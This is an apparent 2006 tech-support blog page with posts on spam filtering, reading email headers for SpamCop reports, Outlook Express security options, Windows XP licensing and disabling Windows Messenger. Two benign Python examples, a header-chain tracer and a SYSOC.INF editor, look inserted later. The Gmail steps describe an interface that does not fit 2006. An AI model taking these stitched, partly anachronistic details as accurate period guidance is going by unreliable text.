• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WgaNotify


July 5, 2006

MailWasher Pro Screens Incoming Email and Filters Out Spam and Viruses

"Spam," in computer-speak, refers to Unsolicited, Commercial Email (UCE) or "Junkmail." Spam is used to hawk everything from counterfeit brand name watches and prescription drugs, to mortgages and loans. Nobody I know wants to receive junk mail, whether in their postal mailbox or computer inbox. Yet, most people who venture online with an email account will be spammed, some to the point where spam email represents 80% of their weekly incoming email. These folks are in serious need of a real solution to help reduce the level of spam that reaches their inboxes. I am going to describe a solution to your email spam problem in this post.

Before I continue with my solution I have to tell you that it is a software-based screening program that does not work with browser-based email systems (AOL, Yahoo, Webmail, or other proprietary email systems). You must be receiving your email via a separate stand-alone POP3 email "client," like Outlook, Outlook Express, Eudora, Thunderbird, or a similar email program. If you are using one of these stand-alone email clients the rest of this discussion applies to you. If not, you are at the mercy of your ISP or email service provider to filter out spam and viruses.

My solution to dealing with spam is to screen all incoming email and filter out anything that trips one of the filter conditions, or is otherwise identified by its content as a phishing attempt, 419-type scam, spam or virus. The program that does this is named MailWasher Pro and I've been using it for several years, and recommend it to all of my friends and clients.

MailWasher Pro intercepts incoming POP3 email accounts (as many as you have setup in it), reads an adjustable number of lines of text, including the full incoming headers, then compares the results with internal and external blacklists and blocklists, and databases of known spam, and sources of spam, as well as known or suspected viruses. MailWasher Pro also contains a built-in Bayesian Learning Filter that you can train to recognize what you call spam and what you don't. Lastly, one of the most powerful features is the user created filters that can be customized to identify virtually any type of undesirable email and either mark it for manual deletion and blacklisting, or automatically delete it immediately. These user filters use both plain text and Regular Expressions to identify strings of text or code that give away a spam message, or virus, or exploit.

If the message contains content that matches any known conditions it is either flagged to be deleted or is automatically deleted from the email server, according to your choices when you set it up. If you are a member of SpamCop MailWasher Pro can forward spam messages directly to your reporting account. SpamCop will generate an autoreply message that contains a link that you must click on to finish the reporting process, because they require manual reports to be filed at all times. Still, this saves you the trouble of displaying the source code, then copying it and pasting it into a browser report field on SpamCop's reporting page.

I have created an entire web page detailing MailWasher Pro and how it works. I have also included a link on that page to a sample of my custom filters that are responsible for eliminating huge amounts of spam, including "image spam." It should be noted that spammer techniques are not standing still and neither are my efforts to create effective rules to counter new spam tricks.

MailWasher Pro is a commercial program that is free to try for 30 days. If you wish to continue using it you will have to pay to license it. The current registration price is $37.00, which includes Free Upgrades for Life. It also includes your first year subscription to the optional FirstAlert! members' reporting system. You can read all about this on my MailWasher Pro web page.

You can go straight to the MailWasher Pro website and download a 30 day trial, by clicking on this link:
Download Mailwasher Pro here


June 19, 2006

How to display the headers of spam/scam emails, for reporting or tracing the source.

Everybody who has an email account is plagued by the spam and scam epidemic that is polluting your inboxes. Most people simply deal with having to resort to hitting Delete over and over again. Others, like yours truly, do something about it. I report all spam that gets through my defenses to SpamCop, where I have a Reporting Member account. I also use an email screening program that automatically deletes most spam, which I will talk about later in this article.

The SpamCop reporting system requires you to be able to display, copy and paste the complete message source, including the normally hidden headers. Displaying an email's source code is what this article is about. Even if you are not a SpamCop reporting member learning how to read the headers will allow you to trace the origin of scam emails (links in extended comments) from financial fraud artists in countries like Nigeria, and to file complaints with the Internet Service Providers that provide the connections to the scammers or spammers.

I am frequently asked "how do I display email headers and source code?" The methods vary with the email client (program), but every one I have seen will offer some means of displaying the full incoming headers. The following sections cover Microsoft Outlook and Outlook Express, Hotmail, Gmail and Yahoo! browser-based email.

MS Outlook
Double click the message to open it in its own window. Then click View-Options and you can view the data in the "Internet headers" pane. You can copy that data and paste it into another email or SpamCop report.

Outlook Express
If the message is not open, right-click on the message in your Inbox and select Properties > Details > Message Source (button).

If the message is already open, simply press Control and F3 (together) and the "Message Source" window will appear. Once the source code is displayed in the resizable window you can copy it and paste it into a report.

Hotmail
If you are using browser-based Hotmail, login and go to "Options." At the Options page click the link labeled "Mail Display Settings" and find the section "Message Headers." Put the dot in the option "Full." Click on "OK" at the bottom to save your changes. Now, when you get a scam email and Forward it the recipient can read the full headers.

You can reveal the complete source code of any email in Hotmail by opening the message and looking for the blue link labeled "View E-mail Message Source," just above the white email message body. The source will open in a new browser window, and can be copied and pasted.

Gmail
After logging into your Gmail account in your browser, open the email you want to inspect. Look to the right side along the top of the message for three vertical dots. Click on the three dots to open an options menu. Move your pointer down to "Show Original" and click on it. A new tab will open containing the original incoming headers.

Yahoo!
If you use Yahoo! email, login and click on "Mail Options." When the options page loads locate the section labeled Personalization and click on the link labeled "General Preferences." On the "General Preferences" page scroll to "Messages" and put the dot in the radio choice labeled "Show ALL Headers."

To forward the headers with an email scam or spam, scroll down farther to "Message Actions" and find "Forwarding Messages." Select the radio choice to "Forward as Inline Text." Click the "Save" button at the bottom. After this all you have to do is Forward any scam emails and the full headers will be at the top of the message.


SpamCop has a list of commonly used email programs, including AOL, with instructions for either displaying the full headers, and/or forwarding as an attachment.


With the source code copied to the Windows Clipboard you can paste it into the report text field in your SpamCop member's reporting page, or paste it into an email that you will send to an authority who can deal with tracing or reporting it, or you can paste it into a new Notepad document and save it for your own analysis.
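Once the source is in a text file, the Received: chain can be read programmatically. The Python below is an added example, not from the post or from SpamCop, using a constructed message with documentation and private addresses: it lists the hops oldest-first, flags a hop that the next hop does not corroborate (a common sign of a forged header line), and names the IP where the message entered the chain of servers you can trust.

```python
"""Walk the Received: chain in a message's full headers, oldest hop first, and
estimate where the message entered the mail system, for a SpamCop report or
an abuse complaint to the originating ISP.

Added example, not from the post or from SpamCop. The message below is
constructed; its hosts and addresses are documentation and private ranges."""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed raw message. Each hop prepends its own Received: line, so the
# topmost line is the last server that handled the message (usually yours).
SAMPLE_RAW = """Received: from mx.example.net (mx.example.net [192.0.2.10])
\tby mail.example.org with ESMTP id 123; Mon, 19 Jun 2006 10:05:00 -0400
Received: from relay.example.net ([198.51.100.7])
\tby mx.example.net with ESMTP; Mon, 19 Jun 2006 10:04:58 -0400
Received: from [10.0.0.5] (helo=ADMIN-PC)
\tby relay.example.net with SMTP; Mon, 19 Jun 2006 10:04:50 -0400
From: "Dr. Barrister" <barrister@example.com>
To: victim@example.org
Subject: URGENT BUSINESS PROPOSAL
Date: Mon, 19 Jun 2006 10:04:49 -0400

Dear friend, I have 10 million US dollars ...
"""

# Same message with an extra, uncorroborated Received: line at the bottom, the
# way a sender adds a fake hop to point blame elsewhere (also constructed).
SAMPLE_FORGED = SAMPLE_RAW.replace(
    "From: ",
    "Received: from bank.example.com (bank.example.com [203.0.113.9])\n"
    "\tby ADMIN-PC with SMTP; Sun, 18 Jun 2006 09:00:00 -0400\n"
    "From: ", 1)

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_RE = re.compile(r"^\s*from\s+(\S+)", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)", re.I)


def parse_received(value):
    """Split one Received: header into from-host, from-IP, by-host and time."""
    value = " ".join(value.split())            # unfold continuation lines
    clause, _, stamp = value.rpartition(";")   # timestamp follows the last ';'
    from_part = re.split(r"\bby\b", clause, maxsplit=1, flags=re.I)[0]
    m_from = FROM_RE.search(from_part)
    m_ip = IP_RE.search(from_part)
    m_by = BY_RE.search(clause)
    return {
        "from": m_from.group(1) if m_from else None,
        "ip": m_ip.group(1) if m_ip else None,
        "by": m_by.group(1) if m_by else None,
        "time": parsedate_to_datetime(stamp.strip()) if stamp.strip() else None,
    }


def received_chain(raw):
    """Hops oldest-first, i.e. the reverse of header order."""
    msg = message_from_string(raw)
    return [parse_received(v) for v in reversed(msg.get_all("Received", []))]


def _linked(older, newer):
    """True when the newer hop says it received the message from the host
    the older hop says handed it over."""
    return bool(older["by"] and newer["from"]
                and older["by"].lower() == newer["from"].lower())


def chain_warnings(chain):
    """Signs of forged lines: a hop the next hop does not corroborate, or a
    timestamp that runs backwards along the chain."""
    warns = []
    for i in range(len(chain) - 1):
        older, newer = chain[i], chain[i + 1]
        if not _linked(older, newer):
            warns.append(f"hop {i + 1} ({older['by']}) is not corroborated by hop {i + 2}")
        if older["time"] and newer["time"] and newer["time"] < older["time"]:
            warns.append(f"hop {i + 2} is timestamped earlier than hop {i + 1}")
    return warns


def origin_ip(chain):
    """Start at the newest hop (trusted: it is your own server) and walk back
    while each hop is corroborated by the next; the from-IP of the last
    corroborated hop is the best estimate of the injection point."""
    i = len(chain) - 1
    while i > 0 and _linked(chain[i - 1], chain[i]):
        i -= 1
    return chain[i]["ip"]


if __name__ == "__main__":
    for raw in (SAMPLE_RAW, SAMPLE_FORGED):
        chain = received_chain(raw)
        for hop in chain:
            print(f"{hop['time']}  from {hop['from']} [{hop['ip']}]  by {hop['by']}")
        print("warnings:", chain_warnings(chain))
        print("origin:", origin_ip(chain), "\n")
```

The private 10.0.0.5 address in the sample is the kind of result you will see for a compromised home machine behind a router; the abuse report then goes to the owner of the first public hop that accepted it (relay.example.net here).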


June 1, 2006

How to control the downloading of email attachments or other harmful content in Outlook Express

I am frequently asked about securing the Outlook Express email client. One of the recurring questions is "why can't I receive file attachments in my email?"

Answer:
The default security setting for Outlook Express is to block file attachments. To allow attachments to be downloaded and opened click on the menu item "Tools" then on Options > Security, and UNCHECK the option labeled "Do not allow attachments to be saved or opened that could potentially be a virus."

What do the other security options control and what effect do they have on my email capabilities?

Virus Protection

"Select the Internet Explorer security zone to use:"

I would recommend selecting the radio option to use the Restricted sites zone (More secure), as it will disable some common exploit codes used by viruses and spyware distributors. By reading email in the Restricted sites zone you prevent tracking cookies from loading and JavaScript from running, and cloaked links to phishing sites will reveal their true destination when you hover the mouse over them.

"Warn me when other applications try to send email as me." This will alert you if a worm gets onto your computer and starts sending out mass spam or virus-infected emails that appear to come from you. While this won't catch more sophisticated email-sending exploits (those using their own SMTP engine), it may stop some exploits from going out with your return address in them. Always select this option.

Download Images:

"Block images and other external content in HTML e-mail."

If you select this option you will not be able to view images in your email. It also prevents tracking gifs, sound files, and flash ads from loading when you open an email. This pretty much cripples 80% of the email you may want to receive, in return for blocking images and tracking gifs in a small percentage of unsolicited commercial email (spam). I personally do not check this option.

The other options only apply to people who maintain digital ID certificates, to apply them when sending or receiving messages. Most of us don't use any of those options.

After you have checked or unchecked your desired settings click Apply to save them, then OK to close the options window.

Continue reading "How to control the downloading of email attachments or other harmful content in Outlook Express" »


May 4, 2006

Converting an unlicensed copy of Windows XP to a legally licensed version

If you have been using an unlicensed copy of Windows XP, Home, Professional, Corporate, or Media version, you already know that manual Windows Updates and optional Windows XP enhancements and driver updates are not available to you. You may have turned on Automatic Windows Updates to at least receive security patches. You may also be one of the millions of users of unlicensed installations of Windows XP who receive the WGA piracy popup notices when you log in and while you are using your computer. You may already know the one I mean. It says:

"This copy of Windows is not genuine; you may be a victim of software counterfeiting." The popup notices will continue to occur until such time as the computer owner installs a valid license code, which may require a phone call to Microsoft support.

In a previous article on this blog I covered the situation in depth, along with temporary workarounds and a permanent solution. This article deals with and recaps the better, permanent solution. Click on the Continue Reading link below, for the full details.

Continue reading "Converting an unlicensed copy of Windows XP to a legally licensed version" »


April 13, 2006

Disabling Windows Messenger on Windows XP Computers

If you're using MSN Messenger, AIM, Yahoo! or Trillian IM clients as your chat, IM or video conferencing tool, you may never use Windows Messenger and have tried to remove it from the startup group to keep it from appearing in your Systray. However, despite removing it from the Registry key that launches it, you may have seen it return on occasion, and had to fight with its icon and "access denied" messages while trying to shut it down.

The reason that Windows Messenger makes these unwanted re-appearances is that Outlook, Outlook Express and even some Microsoft Web pages can still make it load automatically. Fortunately, you can completely stop Windows Messenger from reappearing by making an alteration to the local group policy with the Group Policy Editor. You must be running with Administrator privileges to perform this action.

Here's what you should do:

For Windows XP Professional users:

1. Open the Run dialog box by pressing the keys - Windows + R, or click on Start > Run;

2. In the Open text box type Gpedit.msc and click OK to launch the Group Policy Editor.

3. Go to Computer Configuration | Administrative Templates | Windows Components | Windows Messenger.

4. Double-click the Do Not Allow Windows Messenger To Be Run setting.

5. In the resulting dialog box, select the Enabled option, and click OK.

6. Close the Group Policy Editor.

How to disable Messenger in XP Home Edition

Solution #1 - Uninstall Messenger

1: Locate the file named SYSOC.INF in the C:\Windows\Inf folder. NOTE: This folder and file are hidden by default.

2: Open SYSOC.INF with Notepad and locate this line: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

3: Remove the word "hide" from the line, then close the file, saving the changes.

4: You can now use the Add/Remove Programs icon in the Control Panel to remove this Windows Component.
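The SYSOC.INF edit above is a one-field change in a comma-separated line, which is easy to get wrong in Notepad (deleting a comma changes the meaning of every field after it). The script below is an added example, not code from the article or from Microsoft: it clears the "hide" flag on a named component under the [Components] section while leaving every other byte of the file, including the CRLF line endings, untouched, and it can be pointed at any other hidden component in the same way. The sample INF text is constructed; only the msmsgs line mirrors the one quoted above, and the other entries and the [Global] section are invented for the example.

```python
"""Clear the 'hide' flag on a component entry in SYSOC.INF.

Added example, not from the article. The component line layout is
name=dll,entrypoint,inf,flags,level; the flags field is the fourth value,
and 'hide' there keeps the component out of Add/Remove Windows Components.
"""

# Constructed sample of a SYSOC.INF, not a copy of a real file.
SAMPLE_SYSOC = (
    "[Version]\r\n"
    'Signature="$Windows NT$"\r\n'
    "\r\n"
    "[Components]\r\n"
    "Games=ocgen.dll,OcEntry,games.inf,,7\r\n"
    "msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7\r\n"
    "\r\n"
    "[Global]\r\n"
    "WindowTitle=Windows Components\r\n"
)

HIDE_FIELD = 3  # name=dll,entrypoint,inf,flags,level -> flags is index 3


def _split_line(line):
    """Separate a line into its text and its original line ending."""
    body = line.rstrip("\r\n")
    return body, line[len(body):]


def _is_section_header(stripped):
    return stripped.startswith("[") and stripped.endswith("]")


def component_flags(inf_text, component):
    """Return the flags field of `component` under [Components], or None."""
    in_components = False
    for line in inf_text.splitlines(keepends=True):
        body, _ = _split_line(line)
        stripped = body.strip()
        if _is_section_header(stripped):
            in_components = stripped.lower() == "[components]"
            continue
        if not in_components:
            continue
        name, sep, value = body.partition("=")
        if sep and name.strip().lower() == component.lower():
            fields = value.split(",")
            return fields[HIDE_FIELD].strip() if len(fields) > HIDE_FIELD else ""
    return None


def is_hidden(inf_text, component):
    """True when the component exists and carries the 'hide' flag."""
    flags = component_flags(inf_text, component)
    return flags is not None and flags.lower() == "hide"


def unhide_component(inf_text, component):
    """Return inf_text with the hide flag removed from `component`'s line.

    Only the flags field of the matching line is rewritten; every other
    line, and the line ending, is returned unchanged, so a second run is
    a no-op.
    """
    out = []
    in_components = False
    for line in inf_text.splitlines(keepends=True):
        body, eol = _split_line(line)
        stripped = body.strip()
        if _is_section_header(stripped):
            in_components = stripped.lower() == "[components]"
        elif in_components:
            name, sep, value = body.partition("=")
            if sep and name.strip().lower() == component.lower():
                fields = value.split(",")
                if (len(fields) > HIDE_FIELD
                        and fields[HIDE_FIELD].strip().lower() == "hide"):
                    fields[HIDE_FIELD] = ""
                    line = name + "=" + ",".join(fields) + eol
        out.append(line)
    return "".join(out)


def unhide_in_file(path, component):
    """Apply unhide_component to a file in place, preserving CRLF endings.

    Returns True if the file was changed. Run from an Administrator account;
    the Inf folder is hidden by default (assumed ANSI encoding, as on XP).
    """
    with open(path, encoding="latin-1", newline="") as f:
        original = f.read()
    updated = unhide_component(original, component)
    if updated != original:
        with open(path, "w", encoding="latin-1", newline="") as f:
            f.write(updated)
    return updated != original


if __name__ == "__main__":
    print(unhide_component(SAMPLE_SYSOC, "msmsgs"))
```

Make a copy of SYSOC.INF before running `unhide_in_file` on the real one; the function checks the flags field rather than blindly deleting the word "hide", so a line such as `Games=ocgen.dll,OcEntry,games.inf,,7` that was never hidden is left exactly as it was.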

Stopping Windows Messenger from reappearing with Outlook Express

Even after you go through the trouble of "uninstalling" the darn thing, Windows Messenger still may pop up whenever you run Outlook Express -- which some people do every time they start Windows. To stop Outlook Express from bringing Windows Messenger back onto your System tray, follow these steps:

1. Open Outlook Express.
2. Choose Options from the Tools menu.
3. Click the General tab.
4. Click to remove the checkmark from the box marked, "Automatically log on to Windows Messenger."
5. Click the OK button.
6. Choose Layout from the View menu.
7. Click to remove the checkmark from Contacts.
8. Click the OK button to close the Window.

See more solutions in the extended comments ...

Continue reading "Disabling Windows Messenger on Windows XP Computers" »


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type
